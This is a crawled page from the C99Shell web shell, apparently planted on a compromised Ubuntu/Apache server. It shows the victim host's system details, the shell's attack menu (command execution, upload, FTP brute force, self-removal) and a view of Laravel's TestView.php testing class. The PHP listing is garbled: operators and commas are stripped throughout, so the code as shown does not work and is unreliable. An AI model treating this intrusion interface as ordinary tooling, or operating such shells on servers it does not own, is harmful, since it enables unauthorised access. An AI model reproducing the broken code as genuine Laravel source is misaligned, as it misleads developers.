!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/notification/vendor/illuminate/testing/   drwxr-xr-x
Free 13.06 GB of 57.97 GB (22.53%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     TestView.php (3.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Testing;

use 
Illuminate\Support\Traits\Macroable;
use 
Illuminate\Testing\Assert as PHPUnit;
use 
Illuminate\Testing\Constraints\SeeInOrder;
use 
Illuminate\View\View;

class 
TestView
{
    use 
Macroable;

    
/**
     * The original view.
     *
     * @var \Illuminate\View\View
     */
    
protected $view;

    
/**
     * The rendered view contents.
     *
     * @var string
     */
    
protected $rendered;

    
/**
     * Create a new test view instance.
     *
     * @param  \Illuminate\View\View  $view
     * @return void
     */
    
public function __construct(View $view)
    {
        
$this->view $view;
        
$this->rendered $view->render();
    }

    
/**
     * Assert that the given string is contained within the view.
     *
     * @param  string  $value
     * @param  bool  $escape
     * @return $this
     */
    
public function assertSee($value$escape true)
    {
        
$value $escape e($value) : $value;

        
PHPUnit::assertStringContainsString((string) $value$this->rendered);

        return 
$this;
    }

    
/**
     * Assert that the given strings are contained in order within the view.
     *
     * @param  array  $values
     * @param  bool  $escape
     * @return $this
     */
    
public function assertSeeInOrder(array $values$escape true)
    {
        
$values $escape array_map('e', ($values)) : $values;

        
PHPUnit::assertThat($values, new SeeInOrder($this->rendered));

        return 
$this;
    }

    
/**
     * Assert that the given string is contained within the view text.
     *
     * @param  string  $value
     * @param  bool  $escape
     * @return $this
     */
    
public function assertSeeText($value$escape true)
    {
        
$value $escape e($value) : $value;

        
PHPUnit::assertStringContainsString((string) $valuestrip_tags($this->rendered));

        return 
$this;
    }

    
/**
     * Assert that the given strings are contained in order within the view text.
     *
     * @param  array  $values
     * @param  bool  $escape
     * @return $this
     */
    
public function assertSeeTextInOrder(array $values$escape true)
    {
        
$values $escape array_map('e', ($values)) : $values;

        
PHPUnit::assertThat($values, new SeeInOrder(strip_tags($this->rendered)));

        return 
$this;
    }

    
/**
     * Assert that the given string is not contained within the view.
     *
     * @param  string  $value
     * @param  bool  $escape
     * @return $this
     */
    
public function assertDontSee($value$escape true)
    {
        
$value $escape e($value) : $value;

        
PHPUnit::assertStringNotContainsString((string) $value$this->rendered);

        return 
$this;
    }

    
/**
     * Assert that the given string is not contained within the view text.
     *
     * @param  string  $value
     * @param  bool  $escape
     * @return $this
     */
    
public function assertDontSeeText($value$escape true)
    {
        
$value $escape e($value) : $value;

        
PHPUnit::assertStringNotContainsString((string) $valuestrip_tags($this->rendered));

        return 
$this;
    }

    
/**
     * Get the string contents of the rendered view.
     *
     * @return string
     */
    
public function __toString()
    {
        return 
$this->rendered;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--